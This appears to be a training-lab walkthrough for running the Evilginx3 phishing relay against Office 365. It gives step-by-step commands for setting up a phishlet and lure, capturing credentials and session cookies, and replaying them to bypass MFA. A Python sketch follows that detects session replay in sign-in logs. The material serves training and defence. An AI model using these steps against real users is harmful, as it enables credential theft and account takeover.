Evilginx3

We can use Evilginx3 (https://github.com/kgretzky/evilginx2) for phishing attacks. Evilginx acts as a relay (man-in-the-middle) between the legitimate web page and the target user. The user always interacts with the legitimate website, while Evilginx captures usernames, passwords and authentication cookies. It uses phishlets, which are YAML configuration files for specific target domains. They specify conditions such as hosts, filters, and the structure of authentication cookies and credentials.

Evilginx3 will require some initial setup.

1. Start evilginx3

C:\AzAD\Tools\evilginx-v3.3.0\evilginx.exe -p
evilginx -p C:\AzAD\Tools\evilginx-3.3.0\phishlets -developer

2. Configure the domain

config domain studentx.corp

3. Set the IP for the server

config ipv4 external 172.16.x.x

4. Use the template for Office 365

phishlets hostname o365 studentx.corp

5. Verify DNS

phishlets get-hosts o365

6. Enable phishlets

phishlets enable o365

7. Create the phishing URL

lures create o365

8. Get the phishing URL

lures get-url <ID>

9. Send the URL

Once someone clicks on it, you will get clear-text credentials and session information that can be used to bypass MFA. To interact with the session:

sessions

Then use the session number to interact with it. You would most likely add the cookie and try to log in to https://portal.azure.com:

sessions 1
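
From the defender's side, the cookie reuse described above shows up as one session being used from a client other than the one that completed the sign-in (which, with a relay, is the relay server itself). The following detection sketch is an added example, not part of the original page or of Evilginx; the record layout and field names (`session`, `ip`, `agent`, `kind`) are hypothetical and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample records. The field names are hypothetical,
# not the schema of any real sign-in log.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "user": "alice@example.com", "session": "s-100",
     "ip": "203.0.113.10", "agent": "Edge/Windows", "kind": "signin"},
    {"time": "2024-05-01T09:20:00", "user": "alice@example.com", "session": "s-100",
     "ip": "203.0.113.10", "agent": "Edge/Windows", "kind": "token_use"},
    {"time": "2024-05-01T10:00:00", "user": "bob@example.com", "session": "s-200",
     "ip": "198.51.100.7", "agent": "Chrome/Windows", "kind": "signin"},
    {"time": "2024-05-01T10:03:00", "user": "bob@example.com", "session": "s-200",
     "ip": "192.0.2.44", "agent": "Firefox/Linux", "kind": "token_use"},
]

def find_session_replay(events):
    """Flag sessions whose cookie is later used from an IP or user agent
    different from the one that completed the sign-in."""
    by_session = defaultdict(list)
    for ev in events:
        by_session[ev["session"]].append(ev)

    findings = []
    for session, evs in by_session.items():
        evs.sort(key=lambda e: datetime.fromisoformat(e["time"]))
        idx = next((i for i, e in enumerate(evs) if e["kind"] == "signin"), None)
        if idx is None:
            continue  # sign-in is outside the log window; nothing to compare against
        signin = evs[idx]
        for ev in evs[idx + 1:]:
            changed = [f for f in ("ip", "agent") if ev[f] != signin[f]]
            if changed:
                findings.append({"user": ev["user"], "session": session,
                                 "signin_ip": signin["ip"], "reuse_ip": ev["ip"],
                                 "changed": changed, "time": ev["time"]})
                break  # one finding per session is enough to open a case
    return findings

if __name__ == "__main__":
    for finding in find_session_replay(SAMPLE_EVENTS):
        print(finding)
```

Legitimate clients also change IP address (VPN, mobile networks), so a hit is a lead to triage rather than proof of session theft.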
